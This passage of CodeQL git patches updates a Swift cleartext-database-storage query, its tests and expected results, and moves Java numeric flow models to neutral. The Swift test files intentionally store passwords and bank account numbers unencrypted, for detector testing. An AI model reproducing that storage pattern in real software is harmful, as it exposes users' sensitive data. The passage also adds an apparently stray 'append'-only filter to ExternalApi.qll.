unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | +| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password : | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password : | password | | testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x : | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x : | x | | testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() : | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() : | call to getPassword() | | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | diff --git a/swift/ql/test/query-tests/Security/CWE-311/testCoreData.swift b/swift/ql/test/query-tests/Security/CWE-311/testCoreData.swift index 60ee3147018..dbd02398aae 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/testCoreData.swift +++ b/swift/ql/test/query-tests/Security/CWE-311/testCoreData.swift @@ -29,7 +29,7 @@ class MyManagedObject : NSManagedObject } } set { - setValue(newValue, forKey: "myKey") + setValue(newValue, forKey: "myKey") // [additional result reported here] } } } @@ -61,7 +61,7 @@ func test2(obj : MyManagedObject, password : String, password_file : String) { obj.setIndirect(value: password) // BAD [reported on line 19] obj.setIndirect(value: password_file) // GOOD (not sensitive) - obj.myValue = password // BAD [reported on line 32] + obj.myValue = password // BAD [also reported on line 32] obj.myValue = password_file // GOOD (not sensitive) } diff --git a/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift index 3a79e82b7eb..6cf2afb8094 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift +++ b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift @@ -34,27 +34,27 @@ func testCoreData2_1(obj: MyManagedObject2, maybeObj: MyManagedObject2?, value: { // @NSManaged fields of an NSManagedObject... obj.myValue = value // GOOD (not sensitive) - obj.myValue = bankAccountNo // BAD [NOT DETECTED] + obj.myValue = bankAccountNo // BAD obj.myBankAccountNumber = value // BAD [NOT DETECTED] - obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + obj.myBankAccountNumber = bankAccountNo // BAD obj.myBankAccountNumber2 = value // BAD [NOT DETECTED] obj.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] obj.notStoredBankAccountNumber = value // GOOD (not stored in the database) - obj.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) + obj.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) [FALSE POSITIVE] maybeObj?.myValue = value // GOOD (not sensitive) - maybeObj?.myValue = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.myValue = bankAccountNo // BAD maybeObj?.myBankAccountNumber = value // BAD [NOT DETECTED] - maybeObj?.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber = bankAccountNo // BAD maybeObj?.myBankAccountNumber2 = value // BAD [NOT DETECTED] maybeObj?.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] maybeObj?.notStoredBankAccountNumber = value // GOOD (not stored in the database) - maybeObj?.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) + maybeObj?.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) [FALSE POSITIVE] } class testCoreData2_2 { func myFunc(obj: MyManagedObject2, bankAccountNo: Int) { - obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] + obj.myBankAccountNumber = bankAccountNo // BAD if #available(iOS 10.0, *) { obj.myBankAccountNumber = bankAccountNo // BAD [NOT DETECTED] From 6a0b56bf408b81b99ed571b95efa77778fd22a6a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 10 Jan 2023 18:21:09 +0000 Subject: [PATCH 197/381] Swift: Fix for extensions. --- .../Security/CWE-311/CleartextStorageDatabase.ql | 9 ++++++--- .../CWE-311/CleartextStorageDatabase.expected | 12 ++++++++++++ .../query-tests/Security/CWE-311/testCoreData2.swift | 4 ++-- 3 files changed, 20 insertions(+), 5 deletions(-) diff --git a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql index b34f1b0c6cf..2eddbeeedaf 100644 --- a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql +++ b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql @@ -34,7 +34,8 @@ class CoreDataStore extends Stored { .hasQualifiedName("NSManagedObject", ["setValue(_:forKey:)", "setPrimitiveValue(_:forKey:)"]) and call.getArgument(0).getExpr() = this.asExpr() - ) or + ) + or // any write into a class derived from `NSManagedObject` is a sink. For // example in `coreDataObj.data = sensitive` the post-update node corresponding // with `coreDataObj.data` is a sink. @@ -91,8 +92,10 @@ class CleartextStorageConfig extends TaintTracking::Configuration { // flow out from fields of an `NSManagedObject` or `RealmSwiftObject` at the sink, // for example in `realmObj.data = sensitive`. isSink(node) and - exists(ClassOrStructDecl cd | - c.getAReadContent().(DataFlow::Content::FieldContent).getField() = cd.getAMember() and + exists(ClassOrStructDecl cd, IterableDeclContext cx | + (cx = cd or cx.(ExtensionDecl).getExtendedTypeDecl() = cd) and + c.getAReadContent().(DataFlow::Content::FieldContent).getField() = cx.getAMember() and + // TODO: add a `getAMember` version that accounts for extensions? cd.getABaseTypeDecl*().getName() = ["NSManagedObject", "RealmSwiftObject"] ) or diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index d5b33a22ba1..3c019a1be54 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected @@ -6,6 +6,8 @@ edges | testCoreData2.swift:37:16:37:16 | bankAccountNo : | testCoreData2.swift:37:2:37:2 | [post] obj [myValue] : | | testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | testCoreData2.swift:39:2:39:2 | [post] obj | | testCoreData2.swift:39:28:39:28 | bankAccountNo : | testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | +| testCoreData2.swift:41:2:41:2 | [post] obj [myBankAccountNumber2] : | testCoreData2.swift:41:2:41:2 | [post] obj | +| testCoreData2.swift:41:29:41:29 | bankAccountNo : | testCoreData2.swift:41:2:41:2 | [post] obj [myBankAccountNumber2] : | | testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | testCoreData2.swift:43:2:43:2 | [post] obj | | testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | | testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | @@ -13,6 +15,8 @@ edges | testCoreData2.swift:46:22:46:22 | bankAccountNo : | testCoreData2.swift:46:2:46:10 | [post] ...? [myValue] : | | testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | testCoreData2.swift:48:2:48:10 | [post] ...? | | testCoreData2.swift:48:34:48:34 | bankAccountNo : | testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | +| testCoreData2.swift:50:2:50:10 | [post] ...? [myBankAccountNumber2] : | testCoreData2.swift:50:2:50:10 | [post] ...? | +| testCoreData2.swift:50:35:50:35 | bankAccountNo : | testCoreData2.swift:50:2:50:10 | [post] ...? [myBankAccountNumber2] : | | testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | testCoreData2.swift:52:2:52:10 | [post] ...? | | testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:23:13:23:13 | value : | | testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | @@ -54,6 +58,9 @@ nodes | testCoreData2.swift:39:2:39:2 | [post] obj | semmle.label | [post] obj | | testCoreData2.swift:39:2:39:2 | [post] obj [myBankAccountNumber] : | semmle.label | [post] obj [myBankAccountNumber] : | | testCoreData2.swift:39:28:39:28 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:41:2:41:2 | [post] obj | semmle.label | [post] obj | +| testCoreData2.swift:41:2:41:2 | [post] obj [myBankAccountNumber2] : | semmle.label | [post] obj [myBankAccountNumber2] : | +| testCoreData2.swift:41:29:41:29 | bankAccountNo : | semmle.label | bankAccountNo : | | testCoreData2.swift:43:2:43:2 | [post] obj | semmle.label | [post] obj | | testCoreData2.swift:43:2:43:2 | [post] obj [notStoredBankAccountNumber] : | semmle.label | [post] obj [notStoredBankAccountNumber] : | | testCoreData2.swift:43:35:43:35 | bankAccountNo : | semmle.label | bankAccountNo : | @@ -63,6 +70,9 @@ nodes | testCoreData2.swift:48:2:48:10 | [post] ...? | semmle.label | [post] ...? | | testCoreData2.swift:48:2:48:10 | [post] ...? [myBankAccountNumber] : | semmle.label | [post] ...? [myBankAccountNumber] : | | testCoreData2.swift:48:34:48:34 | bankAccountNo : | semmle.label | bankAccountNo : | +| testCoreData2.swift:50:2:50:10 | [post] ...? | semmle.label | [post] ...? | +| testCoreData2.swift:50:2:50:10 | [post] ...? [myBankAccountNumber2] : | semmle.label | [post] ...? [myBankAccountNumber2] : | +| testCoreData2.swift:50:35:50:35 | bankAccountNo : | semmle.label | bankAccountNo : | | testCoreData2.swift:52:2:52:10 | [post] ...? | semmle.label | [post] ...? | | testCoreData2.swift:52:2:52:10 | [post] ...? [notStoredBankAccountNumber] : | semmle.label | [post] ...? [notStoredBankAccountNumber] : | | testCoreData2.swift:52:41:52:41 | bankAccountNo : | semmle.label | bankAccountNo : | @@ -114,9 +124,11 @@ subpaths #select | testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo : | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo : | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo : | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo : | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo : | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo : | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo : | bankAccountNo | +| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo : | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo : | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '[post] ...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo : | bankAccountNo | | testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo : | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores '[post] obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo : | bankAccountNo | | testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password : | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password : | password | diff --git a/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift index 6cf2afb8094..a08b4994965 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift +++ b/swift/ql/test/query-tests/Security/CWE-311/testCoreData2.swift @@ -38,7 +38,7 @@ func testCoreData2_1(obj: MyManagedObject2, maybeObj: MyManagedObject2?, value: obj.myBankAccountNumber = value // BAD [NOT DETECTED] obj.myBankAccountNumber = bankAccountNo // BAD obj.myBankAccountNumber2 = value // BAD [NOT DETECTED] - obj.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] + obj.myBankAccountNumber2 = bankAccountNo // BAD obj.notStoredBankAccountNumber = value // GOOD (not stored in the database) obj.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) [FALSE POSITIVE] @@ -47,7 +47,7 @@ func testCoreData2_1(obj: MyManagedObject2, maybeObj: MyManagedObject2?, value: maybeObj?.myBankAccountNumber = value // BAD [NOT DETECTED] maybeObj?.myBankAccountNumber = bankAccountNo // BAD maybeObj?.myBankAccountNumber2 = value // BAD [NOT DETECTED] - maybeObj?.myBankAccountNumber2 = bankAccountNo // BAD [NOT DETECTED] + maybeObj?.myBankAccountNumber2 = bankAccountNo // BAD maybeObj?.notStoredBankAccountNumber = value // GOOD (not stored in the database) maybeObj?.notStoredBankAccountNumber = bankAccountNo // GOOD (not stored in the datbase) [FALSE POSITIVE] } From 6bb865ad0511c7114453b8d076135f9e85fdbcbf Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 11 Jan 2023 18:04:43 -0500 Subject: [PATCH 198/381] Java: make numeric flow models neutral --- java/ql/lib/ext/java.lang.model.yml | 23 ++++---- java/ql/lib/ext/java.math.model.yml | 14 ++--- java/ql/lib/ext/java.sql.model.yml | 7 ++- .../ext/java.util.concurrent.atomic.model.yml | 11 +++- .../ql/lib/ext/java.util.concurrent.model.yml | 7 ++- java/ql/lib/ext/java.util.model.yml | 7 ++- java/ql/src/Telemetry/ExternalApi.qll | 1 + java/ql/test/ext/TestModels/Test.java | 59 ------------------- 8 files changed, 44 insertions(+), 85 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index ae383705be1..8d6fa3956ac 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -41,17 +41,9 @@ extensions: - ["java.lang", "IllegalArgumentException", False, "IllegalArgumentException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.lang", "IllegalStateException", False, "IllegalStateException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.lang", "IndexOutOfBoundsException", False, "IndexOutOfBoundsException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - - ["java.lang", "Integer", False, "intValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Integer", False, "parseInt", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Integer", False, "toString", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Integer", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "Iterable", True, "forEach", "(Consumer)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.lang", "Iterable", True, "iterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Iterable", True, "spliterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - - ["java.lang", "Long", False, "longValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Long", False, "parseLong", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Long", False, "toString", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapKey", "ReturnValue.MapKey", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapValue", "ReturnValue.MapValue", "value", "manual"] @@ -97,8 +89,6 @@ extensions: - ["java.lang", "String", False, "valueOf", "(char)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "valueOf", "(char[])", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "valueOf", "(char[],int,int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "String", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "String", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "StringBuffer", True, "StringBuffer", "(CharSequence)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuffer", True, "StringBuffer", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuilder", True, "StringBuilder", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] @@ -143,3 +133,16 @@ extensions: - ["java.lang", "System", "nanoTime", "()", "manual"] - ["java.lang", "Thread", "currentThread", "()", "manual"] - ["java.lang", "Thread", "sleep", "(long)", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.lang", "Integer", "intValue", "()", "manual"] # taint-numeric + - ["java.lang", "Integer", "parseInt", "(String)", "manual"] # taint-numeric + - ["java.lang", "Integer", "toString", "(int)", "manual"] # taint-numeric + - ["java.lang", "Integer", "valueOf", "(int)", "manual"] # taint-numeric + - ["java.lang", "Long", "longValue", "()", "manual"] # taint-numeric + - ["java.lang", "Long", "parseLong", "(String)", "manual"] # taint-numeric + - ["java.lang", "Long", "toString", "()", "manual"] # taint-numeric + - ["java.lang", "Math", "min", "(int,int)", "manual"] # value-numeric + - ["java.lang", "String", "valueOf", "(int)", "manual"] # taint-numeric + - ["java.lang", "String", "valueOf", "(long)", "manual"] # taint-numeric diff --git a/java/ql/lib/ext/java.math.model.yml b/java/ql/lib/ext/java.math.model.yml index 3056e04182a..1d45a4076bf 100644 --- a/java/ql/lib/ext/java.math.model.yml +++ b/java/ql/lib/ext/java.math.model.yml @@ -1,14 +1,12 @@ extensions: - - addsTo: - pack: codeql/java-all - extensible: summaryModel - data: - - ["java.math", "BigDecimal", False, "BigDecimal", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["java.math", "BigDecimal", False, "valueOf", "(double)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - addsTo: pack: codeql/java-all extensible: neutralModel data: - ["java.math", "BigDecimal", "compareTo", "(BigDecimal)", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.math", "BigDecimal", "BigDecimal", "(String)", "manual"] # taint-numeric + - ["java.math", "BigDecimal", "valueOf", "(double)", "manual"] # taint-numeric + - ["java.math", "BigDecimal", "valueOf", "(long)", "manual"] # taint-numeric diff --git a/java/ql/lib/ext/java.sql.model.yml b/java/ql/lib/ext/java.sql.model.yml index 9dd0e7d948c..bf544fdb8e7 100644 --- a/java/ql/lib/ext/java.sql.model.yml +++ b/java/ql/lib/ext/java.sql.model.yml @@ -19,9 +19,7 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.sql", "PreparedStatement", True, "setInt", "(int,int)", "", "Argument[1]", "Argument[-1]", "value", "manual"] - ["java.sql", "PreparedStatement", True, "setString", "(int,String)", "", "Argument[1]", "Argument[-1]", "value", "manual"] - - ["java.sql", "ResultSet", True, "getInt", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.sql", "ResultSet", True, "getString", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - addsTo: @@ -29,3 +27,8 @@ extensions: extensible: neutralModel data: - ["java.sql", "ResultSet", "next", "()", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.sql", "PreparedStatement", "setInt", "(int,int)", "manual"] # value-numeric + - ["java.sql", "ResultSet", "getInt", "(String)", "manual"] # taint-numeric diff --git a/java/ql/lib/ext/java.util.concurrent.atomic.model.yml b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml index 4dc1318c4d8..7dd3d13b301 100644 --- a/java/ql/lib/ext/java.util.concurrent.atomic.model.yml +++ b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml @@ -3,7 +3,14 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.util.concurrent.atomic", "AtomicInteger", False, "AtomicInteger", "(int)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicInteger.value]", "value", "manual"] - - ["java.util.concurrent.atomic", "AtomicInteger", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicInteger.value]", "ReturnValue", "value", "manual"] - ["java.util.concurrent.atomic", "AtomicReference", False, "AtomicReference", "(Object)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicReference.value]", "value", "manual"] - ["java.util.concurrent.atomic", "AtomicReference", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicReference.value]", "ReturnValue", "value", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.util.concurrent.atomic", "AtomicInteger", "AtomicInteger", "(int)", "manual"] # value-numeric + - ["java.util.concurrent.atomic", "AtomicInteger", "get", "()", "manual"] # value-numeric diff --git a/java/ql/lib/ext/java.util.concurrent.model.yml b/java/ql/lib/ext/java.util.concurrent.model.yml index bfffc342558..3d199321dd6 100644 --- a/java/ql/lib/ext/java.util.concurrent.model.yml +++ b/java/ql/lib/ext/java.util.concurrent.model.yml @@ -18,8 +18,6 @@ extensions: - ["java.util.concurrent", "BlockingQueue", True, "put", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "BlockingQueue", True, "take", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util.concurrent", "ConcurrentHashMap", True, "elements", "()", "", "Argument[-1].MapValue", "ReturnValue.Element", "value", "manual"] - - ["java.util.concurrent", "CountDownLatch", False, "CountDownLatch", "(int)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.CountDownLatch.count]", "value", "manual"] - - ["java.util.concurrent", "CountDownLatch", False, "getCount", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.CountDownLatch.count]", "ReturnValue", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "transfer", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "tryTransfer", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "tryTransfer", "(Object,long,TimeUnit)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] @@ -29,3 +27,8 @@ extensions: extensible: neutralModel data: - ["java.util.concurrent", "CountDownLatch", "countDown", "()", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.util.concurrent", "CountDownLatch", "CountDownLatch", "(int)", "manual"] # value-numeric + - ["java.util.concurrent", "CountDownLatch", "getCount", "()", "manual"] # value-numeric diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index ec45266409a..df75f791ced 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -369,8 +369,6 @@ extensions: - ["java.util", "Collections", "emptyList", "()", "manual"] - ["java.util", "Collections", "emptyMap", "()", "manual"] - ["java.util", "Collections", "emptySet", "()", "manual"] - - ["java.util", "Date", "Date", "(long)", "manual"] - - ["java.util", "Date", "getTime", "()", "manual"] - ["java.util", "Iterator", "hasNext", "()", "manual"] - ["java.util", "List", "clear", "()", "manual"] - ["java.util", "List", "contains", "(Object)", "manual"] @@ -390,3 +388,8 @@ extensions: - ["java.util", "Set", "size", "()", "manual"] - ["java.util", "UUID", "randomUUID", "()", "manual"] - ["java.util", "UUID", "toString", "()", "manual"] + + # The below APIs have numeric flow and are currently being stored as neutral models. + # These may be changed to summary models with kinds "value-numeric" and "taint-numeric" (or similar) in the future. + - ["java.util", "Date", "Date", "(long)", "manual"] # taint-numeric + - ["java.util", "Date", "getTime", "()", "manual"] # taint-numeric diff --git a/java/ql/src/Telemetry/ExternalApi.qll b/java/ql/src/Telemetry/ExternalApi.qll index 2f7ebcc9d19..6a51d20e8f5 100644 --- a/java/ql/src/Telemetry/ExternalApi.qll +++ b/java/ql/src/Telemetry/ExternalApi.qll @@ -47,6 +47,7 @@ class ExternalApi extends Callable { * Gets information about the external API in the form expected by the CSV modeling framework. */ string getApiName() { + this.getName() = "append" and result = this.getDeclaringType().getPackage() + "." + this.getDeclaringType().getSourceDeclaration() + "#" + this.getName() + paramsString(this) diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 55c531d99bf..c2053d67929 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -6,8 +6,6 @@ import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.util.StringJoiner; -import java.util.concurrent.CountDownLatch; -import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Function; import java.util.function.Supplier; @@ -38,20 +36,10 @@ public class Test { Throwable t = new Throwable((Throwable)source()); sink((Throwable)t.getCause()); // $hasValueFlow - Integer x = (Integer)source(); - int y = x; - sink(String.valueOf(y)); // $hasTaintFlow - - String s1 = (String)source(); - sink(Integer.parseInt(s1)); // $hasTaintFlow - String s2 = (String)source(); int i = 0; sink(s2.charAt(i)); // $hasTaintFlow - String s3 = (String)source(); - sink(new BigDecimal(s3)); // $hasTaintFlow - ResultSet rs = (ResultSet)source(); sink(rs.getString("")); // $hasTaintFlow } @@ -76,66 +64,19 @@ public class Test { sink((String)e4.getMessage()); // $hasValueFlow sink((Throwable)e4.getCause()); // $hasValueFlow - Integer i1 = (Integer)source(); - sink(i1.intValue()); // $hasTaintFlow - - int i2 = (int)source(); - sink(Integer.toString(i2)); // $hasTaintFlow - - int i3 = (int)source(); - sink(Integer.valueOf(i3)); // $hasTaintFlow - - Long l1 = (Long)source(); - sink(l1.longValue()); // $hasTaintFlow - - String s1 = (String)source(); - sink(Long.parseLong(s1)); // $hasTaintFlow - - Long l2 = (Long)source(); - sink(l2.toString()); // $hasTaintFlow - - long l3 = (long)source(); - sink(String.valueOf(l3)); // $hasTaintFlow - System.setProperty("testKey", (String)source()); sink(System.getProperty("testKey")); // $hasValueFlow - // java.math - long l4 = (long)source(); - sink(BigDecimal.valueOf(l4)); // $hasTaintFlow - - double d1 = (double)source(); - sink(BigDecimal.valueOf(d1)); // $hasTaintFlow - - int i4 = (int)source(); - int i5 = (int)source(); - sink(Math.min(i4, i5)); // $hasValueFlow - sink(Math.min(i4, 42)); // $hasValueFlow - sink(Math.min(42, i5)); // $hasValueFlow - // java.sql Connection con = DriverManager.getConnection(""); PreparedStatement ps1 = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); ps1.setString(1, (String)source()); sink(ps1); // $hasValueFlow - PreparedStatement ps2 = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); - ps2.setInt(2, (int)source()); - sink(ps2); // $hasValueFlow - - ResultSet rs = (ResultSet)source(); - sink(rs.getInt("")); // $hasTaintFlow // java.util.concurrent.atomic - AtomicInteger ai = new AtomicInteger((int)source()); - sink(ai.get()); // 